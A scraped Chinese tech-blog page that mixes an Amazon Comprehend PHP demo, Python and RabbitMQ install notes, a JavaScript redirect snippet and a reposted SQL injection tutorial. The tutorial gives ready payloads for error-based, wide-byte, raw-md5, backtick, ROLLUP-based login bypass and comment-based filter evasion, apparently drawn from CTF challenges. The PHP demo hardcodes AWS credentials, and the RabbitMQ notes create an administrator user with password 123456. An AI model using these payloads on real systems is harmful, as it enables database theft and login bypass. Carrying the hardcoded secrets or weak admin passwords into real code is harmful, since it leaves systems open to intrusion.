Amazon Comprehend 自然语言处理,PHP使用教程,调用示例

Amazon Comprehend 是一项自然语言处理 (NLP) 服务,使用机器学习来发现文本中的洞察信息。Amazon Comprehend 提供关键词提取、情绪分析、实体识别、主题建模和语言检测 API,因此您可以轻松地将自然语言处理集成到您的应用程序中。您只需在应用程序中调用相应 Amazon Comprehend API 并提供源文档或文本的位置即可。这些 API 将以 JSON 格式输出实体、关键词、情绪和语言,以供您在应用程序中使用。

一、通过Composer安装SDK(需要安装aws/aws-sdk-php软件包)

composer require aws/aws-sdk-php

https://packagist.org/packages/aws/aws-sdk-php

或下载独立的AWS来开始使用。 zip 或aws.phar文件。
https://docs.aws.amazon.com/aws-sdk-php/v3/download/aws.zip
二、非框架安装需要引用/vendor/autoload.php
use Aws\Comprehend\ComprehendClient;
use Aws\Exception\AwsException;

完整demo

<?php
namespace app\controller;

use app\BaseController;
use Aws\Comprehend\ComprehendClient;
use Aws\Textract\TextractClient;
use Aws\Exception\AwsException;
class Index extends BaseController
{
	/**
	 * doc:https://docs.aws.amazon.com/aws-sdk-php/v3/api/api-comprehend-2017-11-27.html#detectsentiment
	 */
    public function aws(){
	    $client=new ComprehendClient([
		    'version' => 'latest',
            //'version' => '2018-06-27',
		    'region' => 'us-west-2',
		    'credentials' => [
			    'key' => 'AKIAQHKSE4HRGDDDDDDD', //IAM user key
			    'secret' => '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', //IAM user secret
		    ]]);

	    /**
	     * 情绪分析
	     * 情绪分析 API 会返回文本的整体情绪(正面、负面、中性或混合)。
	     */

	    $result = $client->detectSentiment([
//	    'LanguageCode'=>'en | es | fr | de | it | pt | ar | hi | ja | ko | zh | zh-TW',//必填
	    'LanguageCode'=>'en',//必填
        'Text'=>'Your service attitude is really poor',//必填
		]);
	    print_r($result->toArray());
	    /*
		Array
		(
		    [Sentiment] => NEGATIVE
		    [SentimentScore] => Array
		        (
		            [Positive] => 6.2582264945377E-5
		            [Negative] => 0.99910479784012
		            [Neutral] => 0.00083179638022557
		            [Mixed] => 8.1932506645899E-7
		        )

		    [@metadata] => Array
		        (
		            [statusCode] => 200
		            [effectiveUri] => https://comprehend.us-west-2.amazonaws.com
		            [headers] => Array
		                (
		                    [x-amzn-requestid] => 7436bbaf-73c1-4462-a814-d29efe81522f
		                    [content-type] => application/x-amz-json-1.1
		                    [content-length] => 164
		                    [date] => Thu, 21 May 2020 08:46:28 GMT
		                )

		            [transferStats] => Array
		                (
		                    [http] => Array
		                        (
		                            [0] => Array
		                                (
		                                )

		                        )

		                )

		        )

		)
	    */
	    /**
	     * 语言检测
	     * 语言检测 API 可自动识别出 100 多种语言编写的文本,并返回主导语言以及证明其占据主导地位的置信度得分。
	     */

	    $result =$client->detectDominantLanguage([
		    'Text'=>'Your service attitude is really poor',//必填
	    ]);
	    print_r($result->toArray());
	    /*
	    Array
	    (
		    [Languages] => Array
		    (
			    [0] => Array
			    (
				    [LanguageCode] => en
				    [Score] => 0.98973816633224
                )

            )

		    [@metadata] => Array
			    (
				    [statusCode] => 200
		            [effectiveUri] => https://comprehend.us-west-2.amazonaws.com
		            [headers] => Array
			    (
				    [x-amzn-requestid] => e4a6f3cd-5678-46b7-abd3-51d81e28b69f
			    [content-type] => application/x-amz-json-1.1
		                    [content-length] => 64
		                    [date] => Thu, 21 May 2020 08:42:48 GMT
		                )

		            [transferStats] => Array
			    (
				    [http] => Array
				    (
					    [0] => Array
					    (
					    )

				    )

			    )

		        )

		)
	     */
	    /**
	     * 关键词提取
	     * 关键词提取 API 会返回关键词或谈话要点以及证明此为关键词的置信度。
	     */

	    $result =$client->detectKeyPhrases([
		    'LanguageCode'=>'en',//必填
		    'Text'=>'Your service attitude is really poor',//必填
	    ]);
	    print_r($result->toArray());
        /*
	    Array
	    (
		    [KeyPhrases] => Array
		    (
			    [0] => Array
			    (
				    [Score] => 1
                    [Text] => Your service attitude
	    [BeginOffset] => 0
                    [EndOffset] => 21
                )

        )

		    [@metadata] => Array
			    (
				    [statusCode] => 200
		            [effectiveUri] => https://comprehend.us-west-2.amazonaws.com
		            [headers] => Array
			    (
				    [x-amzn-requestid] => 18657c2a-28d9-432c-9e4b-b403ac597299
			    [content-type] => application/x-amz-json-1.1
		                    [content-length] => 92
		                    [date] => Thu, 21 May 2020 09:01:37 GMT
		                )

		            [transferStats] => Array
			    (
				    [http] => Array
				    (
					    [0] => Array
					    (
					    )

				    )

			    )

		        )

		)
        */


	    /**
	     * 实体识别
	     * 实体识别 API 会返回根据提供的文本自动分类的命名实体(“人物”、“地点”和“位置”等)。
	     */

	    $result =$client->detectEntities([
		    'LanguageCode'=>'en',//必填
		    'Text'=>'Your service attitude is really poor',//必填
	    ]);
	    print_r($result->toArray());
	    /*
	    Array
	    (
		    [Entities] => Array
		    (
		    )

		    [@metadata] => Array
			    (
				    [statusCode] => 200
		            [effectiveUri] => https://comprehend.us-west-2.amazonaws.com
		            [headers] => Array
			    (
				    [x-amzn-requestid] => 78db83bb-7bca-4381-82f8-06deb3e18546
			    [content-type] => application/x-amz-json-1.1
		                    [content-length] => 15
		                    [date] => Thu, 21 May 2020 09:04:33 GMT
		                )

		            [transferStats] => Array
			    (
				    [http] => Array
				    (
					    [0] => Array
					    (
					    )

				    )

			    )

		        )

		)
	     */

	    /**
	     * 语法分析
	     * 借助 Amazon Comprehend Syntax API,客户能够使用分词断句和词性 (PoS) 分析文本,识别文本中的名词和形容词等单词边界和标签。
	     */
	    $result =$client->detectSyntax([
		    'LanguageCode'=>'en',//必填
		    'Text'=>'Your service attitude is really poor',//必填
	    ]);
	    print_r($result->toArray());

	    /*
	    Array
	    (
		    [SyntaxTokens] => Array
		    (
			    [0] => Array
			    (
				    [TokenId] => 1
                    [Text] => Your
	    [BeginOffset] => 0
                    [EndOffset] => 4
                    [PartOfSpeech] => Array
				    (
					    [Tag] => PRON
					    [Score] => 0.99996387958527
			                        )

			                )

			            [1] => Array
				    (
					    [TokenId] => 2
			                    [Text] => service
				    [BeginOffset] => 5
			                    [EndOffset] => 12
			                    [PartOfSpeech] => Array
				    (
					    [Tag] => NOUN
					    [Score] => 0.9985853433609
			                        )

			                )

			            [2] => Array
				    (
					    [TokenId] => 3
			                    [Text] => attitude
				    [BeginOffset] => 13
			                    [EndOffset] => 21
			                    [PartOfSpeech] => Array
				    (
					    [Tag] => NOUN
					    [Score] => 0.99978679418564
			                        )

			                )

			            [3] => Array
				    (
					    [TokenId] => 4
			                    [Text] => is
				    [BeginOffset] => 22
			                    [EndOffset] => 24
			                    [PartOfSpeech] => Array
				    (
					    [Tag] => VERB
					    [Score] => 0.99935394525528
			                        )

			                )

			            [4] => Array
				    (
					    [TokenId] => 5
			                    [Text] => really
				    [BeginOffset] => 25
			                    [EndOffset] => 31
			                    [PartOfSpeech] => Array
				    (
					    [Tag] => ADV
					    [Score] => 0.9999988079071
			                        )

			                )

			            [5] => Array
				    (
					    [TokenId] => 6
			                    [Text] => poor
				    [BeginOffset] => 32
			                    [EndOffset] => 36
			                    [PartOfSpeech] => Array
				    (
					    [Tag] => ADJ
					    [Score] => 0.9997541308403
			                        )

			                )

			        )

			    [@metadata] => Array
				    (
					    [statusCode] => 200
			            [effectiveUri] => https://comprehend.us-west-2.amazonaws.com
			            [headers] => Array
				    (
					    [x-amzn-requestid] => 0eb35b66-d36a-43e8-94ee-b5b0c3e786eb
				    [content-type] => application/x-amz-json-1.1
			                    [content-length] => 722
			                    [date] => Thu, 21 May 2020 09:08:51 GMT
			                )

			            [transferStats] => Array
				    (
					    [http] => Array
					    (
						    [0] => Array
						    (
						    )

					    )

				    )

			        )

			)
	    */

    }
}

https://docs.aws.amazon.com/comprehend/latest/dg/comprehend-general.html

https://aws.amazon.com/cn/comprehend/features/

https://docs.aws.amazon.com/general/latest/gr/rande.html

https://docs.aws.amazon.com/comprehend/latest/dg/supported-languages.html

linux(centos)安装python

下载pthon安装包
https://www.python.org/downloads/source/

wget https://www.python.org/ftp/python/3.8.3/Python-3.8.3.tgz

创建安装目录

mkdir -p /usr/local/python3.8.3

解压

tar -zxvf Python-3.8.3.tgz

 编译安装 首先需要gcc环境和zlib库为了方向键等不出现乱码还需要 readline-devel 包

yum -y install gcc
yum -y install zlib*
yum install readline-devel
cd Python-3.8.3
./configure --prefix=/usr/local/python3.8.3
#编译安装
make && make install
建立软链接
ln -s /usr/local/python3.8.3/bin/python3.8 /usr/bin/python
ln -s /usr/local/python3.8.3/bin/pip3.8 /usr/bin/pip
[root@fd07bda1fc63 bin]# python --version
Python 3.8.3

几种SQL注入(insert,update,delete,`, \ 等。。。)

insert注入:
$sql = “insert into user(username,password) values(‘$username’,’$password’,)”;

payload: 适用于字符型:
‘ or updatexml(1,concat(0x7e,(database())),0) or ‘
适用于数字型:
‘ or extractvalue(1,concat(0x5e24,(database()))) or ‘

$sql = “insert into user(username,password) values(” or updatexml(1,concat(0x7e,(database())),0) or ”,’$_POST[‘password’]’)”;

 

update注入:
$sql = “update user set username=’$username’,password=’$password’ where id=$id”;

payload:适用于字符型:
‘ or updatexml(1,concat(0x7e,(database())),0) or ‘
适用于数字型:
‘ or extractvalue(1,concat(0x5e24,(database()))) or ‘

$sql = “update user set username=” or updatexml(1,concat(0x7e,(database())),0) or ”,password=’$_POST[‘password’]’ where id=$_POST[‘id’]”;

delete注入:
$sql = “delete from user where id=$id”;

pauload:
or or updatexml(1,concat(0x7e,(database())),0) or ‘ ‘
or extractvalue(1,concat(0x5e24,(database()))) or ‘ ‘

其他类型的payload:

‘or(有效载荷)or’

‘and(有效载荷)and’

‘or(有效载荷)and’

‘or(有效载荷)and’=’

‘*(有效载荷)*’

‘or(有效载荷)and’

“ – (有效载荷) – “

宽字节注入:
由于转义了单引号成 \’  但是%df与\构成双字节,%df\结合为中文,从而%27逃逸

$sql = “select * from user where username=’$username'”;

payload:

-1%df%27 union select 1,2,group_concat(column_name) from information_schema.columns

where table_name=’table.name’ #  (后面的”可以使用16进制编码,编码结束后在前面加上0x)

sql语句有 \:
$sql = “select * from users where username=\”.$usename.’\’ and password=\”.$password.’\'”;

$username,$password 被过滤:

function clean($str){
if(get_magic_quotes_gpc()){
$str=stripslashes($str); //删除字符串里的\
}
return htmlentities($str, ENT_QUOTES);
//比如我们对字符串”<script>”使用htmlentities函数,字符串”<script>”将被转化为”&lt;script&gt;”,
//将”<“和“>”转换为HTML实体,可以防止浏览器将它们作为HTML元素的一部分被解释或运行(经常使用在用户提交表单数据的时候)。
//htmlentities($str, ENT_COMPAT); // 只转换双引号
//htmlentities($str, ENT_QUOTES); // 转换双引号和单引号
//htmlentities($str, ENT_NOQUOTES); // 不转换任何引号
}

payload:

username=admin\&password=or 1 #

$sql = “select * from users where username=\”. admin\ .’\’ and password=\”. or 1 # .’\'”;

 

md5加密后的的SQL注入:
$sql = “SELECT * FROM admin WHERE pass = ‘”.md5($password,true).”‘”;

思路比较明确,当md5后的hex转换成字符串后,如果包含’or'<trash>这样的字符串,那整个sql变成

SELECT * FROM admin WHERE pass = ”or’6<trash>’

很明显可以注入了。

难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。
提供一个字符串:ffifdyop
md5后,276f722736c95d99e921722cf9ed621c
再转成字符串:’or’6<trash>

 

sql注入之反引号注入:
mysqli_query($mysqli,”desc `secret_{$table}`”) or Hacker();
$sql = “select ‘flag{xxx}’ from secret_{$table}”;

反引号一般在Esc键的下方,和~在一起。它是为了区分MySQL的保留字与普通字符而引入的符号
create table desc 报错
create table `desc` 成功
一般我们建表时都会将表名,库名都加上反引号来保证语句的执行度。
table=test` `union select group_concat(flagUwillNeverKnow) from secret_flag limit 1,1

 

sql注入之先查询用户,在比较密码

$sql=”SELECT * FROM interest WHERE uname = ‘{$_POST[‘uname’]}'”;  //查询uname
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {  //限制查询只有一条
$key = mysql_fetch_array($query);
if($key[‘pwd’] == $_POST[‘pwd’]) {    //传入的pwd要符合数据库里的pwd
print “CTF{XXXXXX}”;
}else{
print “亦可赛艇!”;
}
}else{
print “一颗赛艇!”;
}

 

使用rollup技巧来绕过:
在sql命令行里:
select uname,pwd from test group by pwd with rollup;
+————–+——-+
| uname        | pwd   |
+————–+——-+
| 123          | 123   |
| 123          | NULL  |
+————–+——-+
rollup作用:在查询结果中多增加一行,而且他的的pwd的值为null。
传参$_POST[pwd]的值为空时,$key[‘pwd’] == $_POST[‘pwd’]满足

在此之前我们还有一个条件要满足`mysql_num_rows($query) == 1`,我们要选择pass为NULL的单独的这一条记录。
从源码分析可得,过滤了逗号,我们不能简单的使用`limit 1,1`这样的语法,而是可以使用`limit 1 offset 1`。就本地环境而言,比如
select uname,pwd from test group by pwd with rollup limit 1 offset 2;
+————–+——-+
| uname        | pwd   |
+————–+——-+
| 123          | NULL  |
+————–+——-+

$sql=”SELECT * FROM interest WHERE uname = ‘{$_POST[‘uname’]}'”;

payload: uname = ‘ or 1=1 group by pwd with rollup limit 1 offset 2 #
pwd = 空

$sql=”SELECT * FROM interest WHERE uname = ‘{ ‘ or 1=1 group by pwd with rollup limit 1 offset 2 # }'”;

正则绕过preg_match(“/\b(select|insert|update|delete)\b/i”,$message)之SQL注入

if(preg_match(“/\b(select|insert|update|delete)\b/i”,$message)){

die(“hello,sangebaimao!”);

}

/*!*/只在mysql中有用,在别的数据库中这只是注释,但是在mysql,/*!select 1*/可以成功执行,在语句前可以加上5位数字,代表版本号,表示只有在大于该版本的mysql中不作为注释

$sql=”insert guestbook(`message`) value(‘$message’);”;

payload:
updatexml:
?message=aaa\x27 and updatexml(0,concat(0x27,(/*!00000select version()*/)),0)%23
extractvalue:
?message=aaa\x27 and extractvalue(0,concat(0x27,(/*!00000select database()*/))) %23
exp:
?message=aaa\x27 and (/*!00000select exp(~(/*!00000select*/ * from (/*!00000select*/ version())a)))%23
————————————————
版权声明:本文为CSDN博主「南人旧心1906」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_42133828/article/details/88765846

js通过浏览器语言 设备跳转指定页面

//移动设备访问跳转

(function(){
var pathname = window.location.pathname;
pathnameobj = pathname.split(‘/’);
filename=pathnameobj[pathnameobj.length – 1];
// alert(filename);

var language=(navigator.browserLanguage || navigator.language).toLowerCase()
var ua=navigator.userAgent.toLowerCase();

var bIsIpad = ua.match(/ipad/i) == “ipad”;
var bIsIphoneOs = ua.match(/iphone os/i) == “iphone os”;
var bIsMidp = ua.match(/midp/i) == “midp”;
var bIsUc7 = ua.match(/rv:1.2.3.4/i) == “rv:1.2.3.4”;
var bIsUc = ua.match(/ucweb/i) == “ucweb”;
var bIsAndroid = ua.match(/android/i) == “android”;
var bIsCE = ua.match(/windows ce/i) == “windows ce”;
var bIsWM = ua.match(/windows mobile/i) == “windows mobile”;
//移动端
if(bIsIpad||bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM){
if(language.indexOf(‘zh’) > -1){
if(filename!=’m_index.html’)window.location.href = “m_index.html”;
}else{
if(filename!=’m_index_en.html’)window.location.href = “m_index_en.html”;
}
}
else//PC端
{
if(language.indexOf(‘zh’) > -1){
if(filename!=’index.html’)window.location.href = “index.html”;
}else{
if(filename!=’index_en.html’)window.location.href = “index_en.html”;
}
}

})();

CentOS7安装RabbitMQ

创建erlang.repo库

curl -s https://packagecloud.io/install/repositories/rabbitmq/erlang/script.rpm.sh | sudo bash

安装erlang

yum install erlang

创建rabbitmq-server.repo库

curl -s https://packagecloud.io/install/repositories/rabbitmq/rabbitmq-server/script.rpm.sh | sudo bash

安装rabbitmq-server

yum install rabbitmq-server

设置开机启动

chkconfig rabbitmq-server on

启动rabbitmq服务

service rabbitmq-server start

image

启用管理后台

rabbitmq-plugins enable rabbitmq_management

添加用户

rabbitmqctl add_user test 123456

配置用户权限

rabbitmqctl set_user_tags test administrator
rabbitmqctl set_permissions -p "/" test ".*" ".*" ".*"

通过浏览器访问管理后台

image

image

停止rabbitmq服务

service rabbitmq-server stop

 

 

https://cloud.tencent.com/developer/article/1447179

安装RabbitMQ服务

安装RabbitMQ服务
普通安装
yum install rabbitmq-server

启动RabbitMQ服务
systemctl start rabbitmq-server

停止RabbitMQ服务
rabbitmqctl stop

安全和端口
netstat -tnlp

SELinux和类似机制或许会通过绑定端口的方式阻止RabbitMQ。当这种情况发生时,RabbitMQ会启动失败。请确认以下的端口是可以被打开的:
4369 (epmd), 25672 (Erlang distribution)
5672, 5671 (启用了 或者 未启用 TLS 的 AMQP 0-9-1)
15672 (如果管理插件被启用)
61613, 61614 (如果 STOMP 被启用)
1883, 8883 (如果 MQTT 被启用)

web监控工具(下载RabbitMQ时默认包含web监控工具)
rabbitmq-plugins enable rabbitmq_management

提示信息
The following plugins have been enabled:
mochiweb
webmachine
rabbitmq_web_dispatch
amqp_client
rabbitmq_management_agent
rabbitmq_management
Plugin configuration has changed. Restart RabbitMQ for changes to take effect.

重启RabbitMQ服务生效
rabbitmqctl stop
systemctl start rabbitmq-server

http://127.0.0.1:15672 默认账号密码 guest
通过docker安装
docker run -it –rm –name rabbitmq -p 5672:5672 -p 15672:15672 rabbitmq:3-management

php think product queue –marketplaceid=US,JP –limit=1000

php think product server –marketplaceid=US,JP –limit=1000

php think product worker –marketplaceid=US,JP –limit=1000 –type=1